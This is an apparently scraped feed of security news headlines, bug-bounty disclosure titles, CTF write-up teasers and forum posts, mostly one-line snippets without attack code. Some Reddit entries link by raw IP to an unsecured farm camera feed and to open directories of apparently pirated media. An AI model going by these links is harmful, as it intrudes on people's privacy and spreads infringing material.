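    The newly revised Cybersecurity Review Measures center on the supply-chain security of critical information infrastructure and strengthen the focus on and regulation of data security.
    Google Chrome urgently fixes zero-day vulnerability exploited in attacks
    Google released Chrome for Windows, Mac and Linux to fix a high-severity zero-day vulnerability used by threat actors in attacks.
    CISA adds 15 new vulnerabilities to its Known Exploited Vulnerabilities Catalog
    The US Cybersecurity and Infrastructure Security Agency (CISA) has added another 15 vulnerabilities to its Known Exploited Vulnerabilities Catalog.  ( 1 min )
    FBI: BlackByte ransomware has breached US critical infrastructure
    The FBI and the US Secret Service issued a joint cybersecurity advisory showing that the BlackByte ransomware group breached at least 3 US critical infrastructure entities over the past 3 months.  ( 1 min )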
  • Open

    Cross-origin resource sharing
    Showmax disclosed a bug submitted by qualin: https://hackerone.com/reports/1478449 - Bounty: $50
    When sharing a Deck card in conversation the metaData can be manipulated to open arbitrary URL
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1358977 - Bounty: $100
    Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click)
    Shopify disclosed a bug submitted by saurabhsankhwar3: https://hackerone.com/reports/1406495 - Bounty: $900
  • Open

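    JDBC Connection URL Attacks
    Author: su18. This article is an author submission; Seebug Paper looks forward to your contributions, and every accepted submission earns a gift! Submission email: paper@seebug.org. What impact can there be when a JDBC connection URL is controllable? Several related attack methods were disclosed a long time ago, but I had never studied them; as the video of the HITB2021SIN talk "Make JDBC Attacks Brilliant Again" was uploaded to Y...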
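    RedLine Stealer disguised as a Windows 11 updater steals user information
    Translator: Knownsec 404 Lab translation team. Original link: https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ Hackers are always looking for topical lures to trick victims into infecting their systems. We recently analyzed one such lure, a fake Windows 11 installer. On January 27, 2022, which was the Windows 11 upgrade...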
  • Open

    Pretty decent collection of movies that is well organized (as well as software and other stuff)
    http://162.12.215.254/Data/ I was looking for the movies and the English ones are mostly good quality, and without any burned in subs or forced dual languages. Sorry if repost. Found searching, "English" in search box with "video" in ['filegroup or ext'] box on eyedex.org submitted by /u/Rest-in-Peep [link] [comments]  ( 1 min )
    First contribution
    https://who.4386.ltd/Doctor/ I think all Marvel files are in 4K. There are more movies in the "movies for" tab. https://who.4386.ltd/Heng/ P.S. the site is in Chinese so let Chrome translate the page first. submitted by /u/CompetitiveMango12 [link] [comments]  ( 1 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hacking Wordle
    How to guess the word of the day through reverse engineering Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )

  • Open

    “That SweetPot of Data Net-tar” My first Honey Pot Walkthrough Part 3
    Part 1 Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on InfoSec Write-ups »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on Medium »  ( 5 min )
    I Too Want a Key Collection — OSINT Challenge 15
    On Jan 20, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out when the… Continue reading on Medium »  ( 2 min )
    How To Find Your Data In Web With Pimeyes And Other Reverse Tools
    Reverse Image Search is a web-based tool for finding identical and similar images related to the image you are looking for. Marketers can… Continue reading on Medium »  ( 2 min )
  • Open

    The Unobvious About XSS and HTML Encoding
    Many people know that before getting the value of a tag attribute, the browser decodes the HTML entities inside. Let’s say if you try to… Continue reading on Medium »  ( 2 min )
    How to get into bug bounties — A list of resources by The XSS Rat
    Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about… Continue reading on Medium »
    What is the Bug Bounty ?
    Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape… Continue reading on CyberSecurity and GDPR compliance »  ( 3 min )
    Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    How I did Full Account Takeover (FATO) using forgot password link?
    How I was able to takeover admin account by exploiting forgot password functionality. Continue reading on Medium »  ( 2 min )
    Broken Access Control Overview
    As I was going through web application vulnerabilities during my 100 days of hacking, I came across this interesting topic Broken Access… Continue reading on Medium »  ( 1 min )
    BigQuery SQL Injection Cheat Sheet
    Last year, we (my research partner on this topic, Anil, and me) found a SQL injection vulnerability on a target at Synack which was… Continue reading on Medium »  ( 5 min )
    Bug Bounty — Bypassing Endpoints
    Hello there, let’s discuss on how to bypass endpoints. Before moving further, let’s take a quick glance about endpoints. Continue reading on Medium »  ( 2 min )
    My First Bounty and How I Got It
    Hello!! This is my first article, and I really hope you enjoy it! From June 2021, I began looking for issues on the websites. Continue reading on Medium »  ( 1 min )
    Javascript Security — Weak Type Bypass
    As you may know, Javascript is a weakly typed language. This feature of the language can be used by hackers to bypass some checks within… Continue reading on Medium »  ( 1 min )
  • Open

    PrivateLoader to new Anubis Loader
    submitted by /u/sysopfb [link] [comments]
    Eliminating Dangling Elastic IP Takeovers with Ghostbuster
    submitted by /u/Mempodipper [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Concrete CMS part2 (Privesc/SSRF/etc.)
    submitted by /u/adrian_rt [link] [comments]
    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/chicksdigthelongrun [link] [comments]
    MyloBot 2022 – Analysis of the new version of this evasive botnet that appears to just send extortion emails, but has the potential to do much more.
    submitted by /u/woja111 [link] [comments]  ( 1 min )
  • Open

    Arbitrary File Read at via filename parameter
    U.S. Dept Of Defense disclosed a bug submitted by shiar: https://hackerone.com/reports/1436223
    Broken Authentication
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/409237
    IDOR
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/389250
    CUI Labelled document out in the open
    U.S. Dept Of Defense disclosed a bug submitted by pll25: https://hackerone.com/reports/1436460
    EC2 subdomain takeover at http:///
    U.S. Dept Of Defense disclosed a bug submitted by dreyand72: https://hackerone.com/reports/1296366
    XSS trigger via HTML Iframe injection in ( https:// ) due to unfiltered HTML tags
    U.S. Dept Of Defense disclosed a bug submitted by rozerx00: https://hackerone.com/reports/1200770
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457277
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457546
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457493
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457444
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457413
    (CORS) Cross-origin resource sharing misconfiguration on https://
    U.S. Dept Of Defense disclosed a bug submitted by fiveguyslover: https://hackerone.com/reports/995144
    default creds on https://
    U.S. Dept Of Defense disclosed a bug submitted by pirateducky: https://hackerone.com/reports/711662
    Unauthorized access to PII leads to MASS account Takeover
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1061736
    RXSS ON https://
    U.S. Dept Of Defense disclosed a bug submitted by iam_a_jinchuriki: https://hackerone.com/reports/1244145
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1415825
  • Open

    Preventing Replay Attacks
    Hey all, I'm going to be participating in an Attack/Defend CTF, and apparently one of the biggest vulnerabilities from previous competitions was replay attacks. Some more details: The server that is traditionally vulnerable to replay attacks is a headless Arch Linux box with limited disk space and no access to the Internet. I have superuser access to this box via SSH; This server exists outside of our defensive LAN. Its sole responsibility is relaying commands to/from external entities. Think like a self-driving Tesla car being told what to do: "Turn left, turn left, turn left...". I should underscore that if an attacker replayed these commands, the car would inevitably crash. I've configured the IPtables on the box to: Drop invalid traffic; Accept existing traffic; Accept SSH from our administrative workstation; Accept commands from our client workstation; Forward traffic to the external entities; and Drop everything else. I want to inquire about any lightweight transport layer security options that I could implement to secure the bidirectional communication. I'm exploring IPsec/VPNs but I haven't found success. I just wanted to ask if I was missing anything simple here. Thank you for your time. submitted by /u/InfamousClyde [link] [comments]  ( 1 min )
    Alienvault OSSIM OTX Issue
    So I just set up a new OSSIM instance from scratch. I've added my API key (and have subsequently regenerated new ones for troubleshooting). I'm not sure how long I have to wait for the OTX subscriptions to sync and download to the OSSIM client, but when I click the dropdown on the OTX page in OSSIM, and click on View Account Details, it takes me to the otx.alienvault.com webpage, and shows that I'm not following or subscribed to any pulses. However, if I log into OTX with the same account, it shows that I am subscribed to several. I've run the 'curl' command to test the OTX-API key and it worked without error. I've also noticed that another alarm I am receiving is "no information available. you are no longer subscribed to this pulse" but there is no information as to what pulse they're referring to. And googling it found an Alienvault KB that said it was fixed in 5.4. I'm on 5.8 (the latest version, up to date as well). Anyone else having this issue with Alienvault OSSIM and OTX not syncing? If there's a command to force sync (I've done the option in the console for updating the threat feeds), that would be appreciated. submitted by /u/Phyxiis [link] [comments]  ( 1 min )
    Building a forensics lab - what are must haves? Any templates?
    We have some spare resources and we're looking to build a dedicated forensics, analysis lab. We have a couple of PowerEdges we can use. The current plan is a segregated environment to clone suspect machines and see how they interact and do whatever analysis is required. I don't really know where to start except segregating it or having a faux network connection. It seems a lot of people just run labs locally, however we're required to essentially have thin clients. What have your team built for this? Any must have tools? submitted by /u/idnUygelps [link] [comments]  ( 3 min )
    What are the Open Source Network Scanning Tools?
    We are a medium size healthcare medical center, maybe 300 nodes. What are the available open source /free tools I can use to achieve this use case? Scanner that will say “2 new systems in this". Results should give me the OS version and check if antivirus is installed. submitted by /u/techno_it [link] [comments]  ( 1 min )
    Using Tomcat Virtual Host Manager
    I found access to Tomcat Virtual Host Manager on Tomcat 9 (not the one that deploys WAR files) which according to docs means the account has the role "admin-gui". I've been asked if I can pivot further using this but I'm completely stuck because I've never used it. All I can use is a form which can "Add Virtual Host" but from my testing (and limited experience with Tomcat) I've run into a halt. Anyone know if this can be used to privesc? submitted by /u/plutofoxtrot [link] [comments]  ( 1 min )
    LastPass free account with yubikey?
    LastPass free account by default doesn't support Yubikey. But LastPass supports Google auth. In theory, they are all compatible because of the same protocol. Can I just select "Google Auth." then go ahead and use my Yubico auth. app? Thanks. Does anyone have experience? submitted by /u/mk_life [link] [comments]  ( 1 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 2 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will learn a little bit about forensic analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/dmchell [link] [comments]
    cube0x0/KrbRelay: Framework for Kerberos relaying
    submitted by /u/dmchell [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]
    Install Invisible Malicious Apps Remotely, Acting As Updates
    submitted by /u/banginpadr [link] [comments]
    How I Hacked A Reputed Hacker
    submitted by /u/banginpadr [link] [comments]
  • Open

    Preventing, Detecting, & Hunting for Exploitation of the Log4j 2 Vulnerability
    Article URL: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ Comments URL: https://news.ycombinator.com/item?id=30335183 Points: 2 # Comments: 0  ( 28 min )
  • Open

    aimbot idea?
    I was thinking that what if there was a type of screen reader or something like that that detected enemy characters in a video game and locked your mouse to it? is that even possible? just an idea I don't know the technicalities submitted by /u/mr_killlerrrrr [link] [comments]  ( 1 min )
  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    Article URL: https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/ Comments URL: https://news.ycombinator.com/item?id=30333641 Points: 2 # Comments: 0  ( 14 min )
    CVE-2021-23567
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-23567 Comments URL: https://news.ycombinator.com/item?id=30328625 Points: 4 # Comments: 4  ( 4 min )
  • Open

    SecWiki News 2022-02-14 Review
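    SecWiki Weekly (Issue 415) by ourren; Summary of Java Security Research and Security Development Interview Questions by ourren; An Incident Response to a Cryptomining Virus by ourren. For more of the latest articles, visit SecWiki  ( 2 min )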
  • Open

    What are The Red Team and Blue Team in Cyber Security?
    The red team comprises offensive security experts that attempt to attack the cybersecurity defenses of an organization. On the other hand… Continue reading on Medium »  ( 1 min )
  • Open

    Small Business DFIR Services
    Hey all, I wanted to discuss something with this community. Recently I got an ask to recommend DFIR services for a small business (<50 employees) after they were hacked. I started thinking and realized there was not any business I knew of to help small businesses. First, if anyone knows of a US-based company for DFIR services I would appreciate a suggestion. Second, I do not believe there is any low-cost DFIR company that is meant for small (or medium-sized) business. So, what do you think it would take for these large consulting firms, or even a government service, to provide accessible services to any small business that doesn't have the capital to hire the larger cybersecurity or consulting firms? I.e. create a special LICENSE on open source projects, organize a not-for-profit with rotating analysts, pro-bono cyber, etc. submitted by /u/Jklm264 [link] [comments]  ( 7 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon for a Windows environment, especially dedicated servers managed by developers or IT staff, to have the Notepad++ text editor installed.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

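    BotenaGo Botnet Source Code Leaked, Adding to Attackers' Arsenal
    In November 2021, AT&T Alien Labs first disclosed BotenaGo, malware written in Golang. Recently, the malware's source code was uploaded to GitHub, which may give rise to more malware variants.  ( 1 min )
    FritzFrog Expands Rapidly, Nearly 40% of Victims Are in China
    FritzFrog spreads mainly through SSH brute forcing and deploys malware once the brute force succeeds. Researchers found that about 37% of FritzFrog's compromised hosts are located in China.  ( 1 min )
    FreeBuf Morning News | Revised "Cybersecurity Review Measures" Take Effect Today; Zhihu Says It Has Not Used a Behavior-Sensing System to Monitor Employees
    Zhihu stated that illegally collecting personal information seriously departs from Zhihu's values, and that it has always firmly opposed systems of this kind.  ( 1 min )
    Over USD 602 Million! Ransomware Ransom Payments Hit a Record High in 2021
    Surveys show that the ransomware threat continued to grow worldwide in 2021. Organizations and institutions around the world paid more than USD 600 million in cryptocurrency over the past year.
    A Declassified Document Reveals the CIA Is Secretly Collecting Information on US Citizens at Home
    According to a document declassified on February 10, the US Central Intelligence Agency has been secretly collecting data on citizens within the United States without Congressional authorization.  ( 1 min )
    Apple Fixes a New Zero-Day Vulnerability
    Apple has successfully fixed a new WebKit zero-day vulnerability.  ( 1 min )
    Half of the World's Email in 2021 Was Spam
    According to Kaspersky's latest report, more than half of last year's email was spam  ( 1 min )
    HeyTea Lays Off Its Entire Security Department: Yuanfang, What Do You Think?
    Security departments are so undervalued that when a company runs into business trouble they are almost the first to be cut, in order to reduce operating costs.  ( 1 min )
    How to Recruit Security R&D Talent Well: Building the Team Model
    For a cybersecurity technology company, talent is the most valuable asset. Generally, about 70% of a company's costs are personnel costs; without the right people, every grand technological ambition is a flower in the mirror  ( 1 min )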
  • Open

    grave headstones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Cams at an Asian hog farm
    http://27.156.152.250:8889/ If you're lucky you'll see the grumpy old farmer. Warning, possibly some dead animals and cruelty. -edit submitted by /u/inoculatemedia [link] [comments]
  • Open

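    ModifiedElephant: After a Decade in Hiding, an Indian Hacking Group Surfaces
    Translator: Knownsec 404 Lab Translation Team. Original link: https://assets.sentinelone.com/sentinellabs-apt/modified-elephant-apt Abstract: Our research attributes this decade of activity to a threat actor we call ModifiedElephant. ModifiedElephant conducts targeted attacks against human rights activists, human rights defenders, academics and lawyers across India, ...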
  • Open

    Intigriti XSS Challenge 0222 — Write-Up
    XSS challenge by intigriti Solved by Th3Mind Continue reading on Medium »  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing my solution to Intigriti’s February XSS Challenge 0222 Continue reading on InfoSec Write-ups »
    #Bug Bounty - How I was able to purchased premium feature just for “1” PKR by (Parameter…
    Price Manipulation Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — DAY 9
    Objectives of day 9 : Continue reading on Medium »  ( 1 min )
    Install LinkFinder on Kali Linux
    LinkFinder : a tool written in python that finds the endpoints from/in JavaScript files. Continue reading on Medium »  ( 1 min )
    How to Setup/Configure Burpsuite with Firefox
    Hello all i am back with another blog on bug bounty we will see how we can setup/configure burpsuite with firefox to intercept all… Continue reading on Medium »  ( 1 min )
    Exploiting CVE-2019–5418- File Content Disclosure on Rails
    In Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1, and v3, a File Content Disclosure vulnerability exists where properly designed… Continue reading on Medium »  ( 1 min )
    Broken Link Hijacking - Mr. User-Agent
    Summary : Continue reading on Medium »  ( 3 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much Continue reading on Medium »  ( 3 min )
  • Open

    How do Secrets Managers help?
    Nearly everyone seems to say that the best way to store secrets in a cloud environment is to put them in a secrets manager and only fetch them when needed. This has the advantage of allowing seamless key rotation, adding IAM policies, etc. Does this actually increase the security posture of the app though? The app still needs to authenticate with a key manager somehow - I would guess by way of an API token or similar. If the app or the box serving the app get owned, doesn't this basically compromise all the secrets in the secret manager accessible to the app? Also, assuming my previous statement is correct, there must be a "bootstrapping secret" which is injected to the app that lets it talk to the secrets manager. How does the app get access to that secret? I don't mean in a specific cloud (e.g. Azure, GCP, AWS) - just in general, how does whoever is providing the secret know to trust the app? submitted by /u/parallelocat [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target to send to S3: .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X Is this the way? From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
    Given that smart light bulbs can be 'hidden' in plain sight, and most of them are reflashable - how long will it be until the first one is used to gain a foothold inside a target network?
    I was actually looking for something to use as a PWNplug, but even those stand out a bit, whereas wifi light bulbs are ... just light bulbs, with wifi, and a devkit. https://hackaday.com/2020/02/11/custom-firmware-for-cheap-smart-bulbs-is-a-cinch-to-tinker-with/ Most of them seem to be based on the same Espressif chipset https://github.com/ct-Open-Source/tuya-convert https://github.com/arendst/Tasmota This was more of a rhetorical question, but I thought it might interest some of you. submitted by /u/boli99 [link] [comments]  ( 3 min )
    Career in Bug Bounty?
    I read an article about a pen tester making 300k off a bug bounty. My question is can someone live off this? Can anyone do this with the right knowledge and training? Do you have to be some sort of genius? submitted by /u/Bugskee [link] [comments]  ( 3 min )
  • Open

    Who Needs A Niche Threat Actor Specific IoC (Indicator of Compromise) STIX/STIX2/TAXII Feed?
    UPDATE: The feed's official web site including the brochure. Dear blog readers, Who needs access to my STIX/STIX2/TAXII Threat Actor Specific IoC (Indicator of Compromise) feed? Drop me a line today at dancho.danchev@hush.com Stay tuned!
  • Open

    Resource/Reference for Crypto mining Artifacts?
    Looking for a good resource (web page, poster, graphic etc.) for locating artifacts that indicate the use of a crypto miner on a computer. Does anyone know of anything? submitted by /u/admincee [link] [comments]  ( 1 min )
    Magnet Web Page Saver
    Has anyone here had working experience with the free tool Web Page Saver? I am looking into using it at my lab and have some serious questions about how it works and when/what cases it should be used with. Any guidance is appreciated submitted by /u/trex4n6 [link] [comments]  ( 1 min )
    Bulk Extractor Review
    Howdy all! Newbie alert! So I recently started using Bulk_Extractor with Volatility for Memory Forensics! My real question is how reliable are the results obtained from Bulk Extractor? I see a lot of explicit websites in my Bulk Extractor Domain Histogram results! But I am not able to find them in Volatility! Any idea of how this works? submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X ​ From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
  • Open

    Ask HN: Vulnerability Research in 2032?
    Hi HN, I've always been curious about bug hunting. Finding vulns. I have some foundational knowledge like fuzzing, basic web security and reading assembly, but I am also aware of all the improvements in software and web security and there are so many new tech stacks, languages and platforms these days. Where does one begin? Is it worth learning how to find memory safety vulns given how C and friends are dying (and when they are alive things like CFG and appguard make it impossible to exploit them)? Are there any modern books or sites you recommend? Should I be learning some language (rust/go?) or stack (k8s?) as a prerequisite? Comments URL: https://news.ycombinator.com/item?id=30324988 Points: 1 # Comments: 0  ( 1 min )
    Apple emits emergency fix for exploited-in-the-wild WebKit vulnerability
    Article URL: https://www.theregister.com/2022/02/11/apple_emergency_webkit/ Comments URL: https://news.ycombinator.com/item?id=30324643 Points: 4 # Comments: 3  ( 9 min )
  • Open

    SysWhispers Shellcode Loader w/ ETW patching, anti-sandboxing, and 6 execution options
    submitted by /u/ChadMotivation [link] [comments]
  • Open

    What is a Skip Tracer?
    Skip tracing is the process of tracking down people who are particularly hard to find, whether they’re persons-of-interest, fact witnesses… Continue reading on Medium »
    Creating a Honeypot
    First it’s important to describe what a honeypot is and why it’s a good idea to create on. In the cyber security field a honeypot is… Continue reading on Medium »  ( 9 min )
  • Open

    SecWiki News 2022-02-13 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Mostly big boobs photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
  • Open

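    Summary of Key Points in PHP-Related CTF Challenges (Part 2)
    This article mainly summarizes the PHP-related key points I encountered while working through ctfshow challenges. Because summarizing only the knowledge points and test points would be rather abstract and hard to follow, I summarize them through the challenges themselves, which makes them easier to understand.  ( 2 min )
    Summary of Key Points in PHP-Related CTF Challenges (Part 1)
    This article summarizes the PHP-related key points encountered in ctfshow challenges.  ( 2 min )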
  • Open

    Widespread CSRF on authenticated POST endpoints
    UPchieve disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1309435
  • Open

    CVE-2021-45464 – LKVM Escape
    Article URL: https://www.kalmarunionen.dk/writeups/2021/hxp-2021/lkvm/ Comments URL: https://news.ycombinator.com/item?id=30320463 Points: 4 # Comments: 0  ( 11 min )
    The long road to a fix for CVE-2021-20316
    Article URL: https://lwn.net/SubscriberLink/884052/c946bb7f8d39c54e/ Comments URL: https://news.ycombinator.com/item?id=30319122 Points: 8 # Comments: 0  ( 16 min )

  • Open

    Biohazard- Tryhackme CTF
    This is a write-up about the Biohazard CTF room from Tryhackme (a free cybersecurity training site that provides machines for you to… Continue reading on Medium »  ( 8 min )
    Exploit SUID misconfiguration for privilege escalation
    In this article, I am going to explain what are SUID binaries how to exploit them for getting root shell i.e privilege escalation on the… Continue reading on Medium »  ( 2 min )
  • Open

    [h1-2102] Break permissions waterfall
    Shopify disclosed a bug submitted by hogarth45: https://hackerone.com/reports/1088159 - Bounty: $500
    Blind XSS on Twitter's internal Jira panel at allows exfiltration of hackers reports and other sensitive data
    Twitter disclosed a bug submitted by iambouali: https://hackerone.com/reports/1369674 - Bounty: $5040
  • Open

    My Pentest Log -6-
    Greetings Everyone from Hippodrome (Constantinople), Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 8
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web Technologies Knowledge required for starting with the web Exploitation Part-3
    Hello Hackers hope so You are doing well. I myself Manan Aggarwal a Btech Student is Here to Present you the blog in the continuation of… Continue reading on Medium »  ( 6 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways… Continue reading on Medium »  ( 2 min )
    Hacking My ISP For FREE Internet
    Note: This article is only for educational purpose. Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - BROKEN ACCESS CONTROL LAB SOLUTIONS
    Access Control or Authorization, with respect to the requested actions or the resources being accessed, who or what… Continue reading on Medium »  ( 10 min )
    HOW I GOT THE BOUNTY OF $280+ in just a matter of seconds…
